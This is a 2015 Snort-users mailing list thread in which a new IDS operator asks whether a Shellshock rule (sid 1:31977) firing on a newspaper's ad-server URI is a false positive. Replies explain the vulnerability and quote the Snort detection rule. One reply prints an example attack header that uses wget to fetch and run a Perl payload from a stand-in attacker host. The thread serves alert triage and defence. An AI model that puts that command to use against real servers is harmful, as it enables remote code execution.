<div dir="ltr">The URI that is being alerted on is <div><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">/ad/sacbee.jsp?loc=sbp_sbw_</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">ros_ros_mediumbox&fmt=&fmtpos=</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">&keyw=&jsfuncstart=(function()</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">%20{%20var%</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">20adagioAsyncParams={%22ap%22:</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">true,%22ph%22:%22mainstage-</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">free-html%22};&jsfunc=})();&</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">jsfuncno=//})();&rlp=&rnd=</span><span style="color:rgb(31,73,125);font-family:Calibri,sans-serif;font-size:14.6666669845581px">267194691727</span><br></div><div> </div><div>That URI is in an HTTP GET request coming from the host inside our network, and that GET happens immediately after browsing to <a href="http://sacbee.com">sacbee.com</a>.  After a little more research, it looks like this is being caused by some Ad server running on their web server, and it's not trying to execute any shell commands.  </div><div><br></div><div>At the moment, we're using the base policy "Balanced Security and Connectivity", and have not made any modifications to it.  So, the rule for 1:31977 is:</div><div><span style="color:rgb(51,51,51);font-family:verdana,sans-serif;font-size:10.6666669845581px;line-height:16px">alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"OS-OTHER Bash CGI environment variable injection attempt"; flow:to_server,established; content:"() {"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:cve,2014-6271; reference:cve,2014-6277; reference:cve,2014-6278; reference:cve,2014-7169; classtype:attempted-admin; sid:31977; rev:4; )</span><br></div><div><span style="color:rgb(51,51,51);font-family:verdana,sans-serif;font-size:10.6666669845581px;line-height:16px"><br></span></div><div>It's pretty clear that "() {" is in the URI, so that makes sense why it triggered.  I'm a little unclear on $EXTERNAL_NET vs $HOME_NET right now, and why the rule is triggered on the outbound traffic (although it is good to know there's no malicious traffic originating from our network).  I need to look into that...maybe something we missed during initial configuration.</div><div><br></div><div>The pcap of the packet that generated the alert is attached.</div><div><br></div><div>Thanks,</div><div>Colin</div><div><br></div></div><div class="gmail_extra"><br><div class="gmail_quote">On Tue, Mar 3, 2015 at 11:57 AM, Joel Esler (jesler) <span dir="ltr"><<a href="mailto:jesler@...589..." target="_blank">jesler@...589...</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">



<div style="word-wrap:break-word">
We made a blog post back when this came out on the details of the vulnerability here:
<div><br>
</div>
<div><a href="http://vrt-blog.snort.org/2014/09/shellshock-update-bash-immediately.html" target="_blank">http://vrt-blog.snort.org/2014/09/shellshock-update-bash-immediately.html</a></div>
<div><br>
</div>
<div><br>
</div>
<div><span style="font-family:'Lucida Grande'">--</span><br>
<span style="font-family:'Lucida Grande'"><b>Joel Esler</b></span><br>
<span style="font-family:'Lucida Grande'">Open Source Manager</span><br>
<span style="font-family:'Lucida Grande'">Threat Intelligence Team Lead</span><br>
<span style="font-family:'Lucida Grande'">Talos Group</span></div><div><div class="h5">
<div><font face="Lucida Grande"><br>
</font>
<div>
<blockquote type="cite">
<div>On Mar 3, 2015, at 11:37 AM, s0ups . <<a href="mailto:ynots0ups@...843.....11827..." target="_blank">ynots0ups@...11827...</a>> wrote:</div>
<br>
<div>
<div dir="ltr">
<div class="gmail_extra">
<div class="gmail_quote">On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <span dir="ltr">
<<a href="mailto:colin.p.edwards@...11827..." target="_blank">colin.p.edwards@...11827...</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex">
<div dir="ltr">Hello Snort Users,
<div><br>
</div>
<div>I'm a new list member, and happy to say that I've been working with Firesight and a couple of ASA-X Firepower modules for almost a week now.  This is my first time hands-on w/ an IPS/IDS.  I'm here because I found this message from this list while
 researching an alert: <a href="http://sourceforge.net/p/snort/mailman/message/32980285/" target="_blank">
http://sourceforge.net/p/snort/mailman/message/32980285/</a> .  I had a user viewing a newspaper's website today, and I received an alert for 1:31977.  I actually wasn't familiar with the domain name, and just searching for the domain I saw in the alert in
 Google also generated an alert from my workstation (I assume something to do with Google pulling news/images to display in the results?).  The URI from the request does have "() {" in it, so that's why it was triggered, but I don't know if it's a False Positive
 alert.  The website was for the Sacramento Bee (<a href="http://www.sacbee.com/" target="_blank">www.sacbee.com</a>).  I can provide more detail from the pcap / URI when I'm back in the office tomorrow.</div>
<div><br>
</div>
<div><br>
</div>
<div>While I'm introducing myself as a snort newbie...If anyone has any recommendations for other resources or reading material, feel free to message me off-list.</div>
<div><br>
</div>
<div>Cheers,</div>
<div>Colin Edwards</div>
<div>CISSP, GCIH, GCWN, GSEC, MCSE</div>
</div>
<br>
</blockquote>
</div>
<br>
<div>
<div>
<div>Yo Colin,<br>
</div>
<div><br>
As you probably know, Shellshock attacks attempt to exploit environment variables that use user-provided data. The attacks are pretty easy to identify as they usually have some recognizable commands after the "() { :;};". I've actually hardly, if ever, see
 1:31977 in my environment as the majority of the legit hits I see target HTTP header fields (so 1:31978 is more common) like so:<br>
</div>
    GET /cgi-bin/possiblevulnerablescript.cgi<br>
</div>
    User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget <a href="http://attackerwebsite/maliciousperlcode;perl" target="_blank">
http://attackerwebsite/maliciousperlcode;perl</a> maliciousperlcode<br>
<br>
Fireeye has a good explanation and illustration of the various attack methods seen for the Shellshock vulnerability which will give you a good idea on what the common attacks look like. (<a href="https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html" target="_blank">https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html</a>)<br>
<br>
</div>
Chances are if it's an HTTP response from an external webserver to a client browser than it's a FP and poses little to no threat. I'd be interested in checking out the URI if you want to send it to me.<br>
<br>
</div>
<div class="gmail_extra">- s0ups<br>
</div>
</div>
<div class="gmail_extra"><br>
<div class="gmail_quote">On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <span dir="ltr">
<<a href="mailto:colin.p.edwards@...11827..." target="_blank">colin.p.edwards@...11827...</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
<div dir="ltr">Hello Snort Users,
<div><br>
</div>
<div>I'm a new list member, and happy to say that I've been working with Firesight and a couple of ASA-X Firepower modules for almost a week now.  This is my first time hands-on w/ an IPS/IDS.  I'm here because I found this message from this list while
 researching an alert: <a href="http://sourceforge.net/p/snort/mailman/message/32980285/" target="_blank">
http://sourceforge.net/p/snort/mailman/message/32980285/</a> .  I had a user viewing a newspaper's website today, and I received an alert for 1:31977.  I actually wasn't familiar with the domain name, and just searching for the domain I saw in the alert in
 Google also generated an alert from my workstation (I assume something to do with Google pulling news/images to display in the results?).  The URI from the request does have "() {" in it, so that's why it was triggered, but I don't know if it's a False Positive
 alert.  The website was for the Sacramento Bee (<a href="http://www.sacbee.com/" target="_blank">www.sacbee.com</a>).  I can provide more detail from the pcap / URI when I'm back in the office tomorrow.</div>
<div><br>
</div>
<div><br>
</div>
<div>While I'm introducing myself as a snort newbie...If anyone has any recommendations for other resources or reading material, feel free to message me off-list.</div>
<div><br>
</div>
<div>Cheers,</div>
<div>Colin Edwards</div>
<div>CISSP, GCIH, GCWN, GSEC, MCSE</div>
</div>
<br>
------------------------------------------------------------------------------<br>
Dive into the World of Parallel Programming The Go Parallel Website, sponsored<br>
by Intel and developed in partnership with Slashdot Media, is your hub for all<br>
things parallel software development, from weekly thought leadership blogs to<br>
news, videos, case studies, tutorials and more. Take a look and join the<br>
conversation now. <a href="http://goparallel.sourceforge.net/" target="_blank">
http://goparallel.sourceforge.net/</a><br>
_______________________________________________<br>
Snort-users mailing list<br>
<a href="mailto:Snort-users@lists.sourceforge.net" target="_blank">Snort-users@lists.sourceforge.net</a><br>
Go to this URL to change user options or unsubscribe:<br>
<a href="https://lists.sourceforge.net/lists/listinfo/snort-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/snort-users</a><br>
Snort-users list archive:<br>
<a href="http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users" target="_blank">http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users</a><br>
<br>
Please visit <a href="http://blog.snort.org/" target="_blank">http://blog.snort.org</a> to stay current on all the latest Snort news!<br>
</blockquote>
</div>
<br>
</div>
------------------------------------------------------------------------------<br>
Dive into the World of Parallel Programming The Go Parallel Website, sponsored<br>
by Intel and developed in partnership with Slashdot Media, is your hub for all<br>
things parallel software development, from weekly thought leadership blogs to<br>
news, videos, case studies, tutorials and more. Take a look and join the <br>
conversation now. <a href="http://goparallel.sourceforge.net/_______________________________________________" target="_blank">
http://goparallel.sourceforge.net/_______________________________________________</a><br>
Snort-users mailing list<br>
<a href="mailto:Snort-users@lists.sourceforge.net" target="_blank">Snort-users@lists.sourceforge.net</a><br>
Go to this URL to change user options or unsubscribe:<br>
<a href="https://lists.sourceforge.net/lists/listinfo/snort-users" target="_blank">https://lists.sourceforge.net/lists/listinfo/snort-users</a><br>
Snort-users list archive:<br>
<a href="http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users" target="_blank">http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users</a><br>
<br>
Please visit <a href="http://blog.snort.org" target="_blank">http://blog.snort.org</a> to stay current on all the latest Snort news!</div>
</blockquote>
</div>
<br>
</div>
</div></div></div>

</blockquote></div><br></div>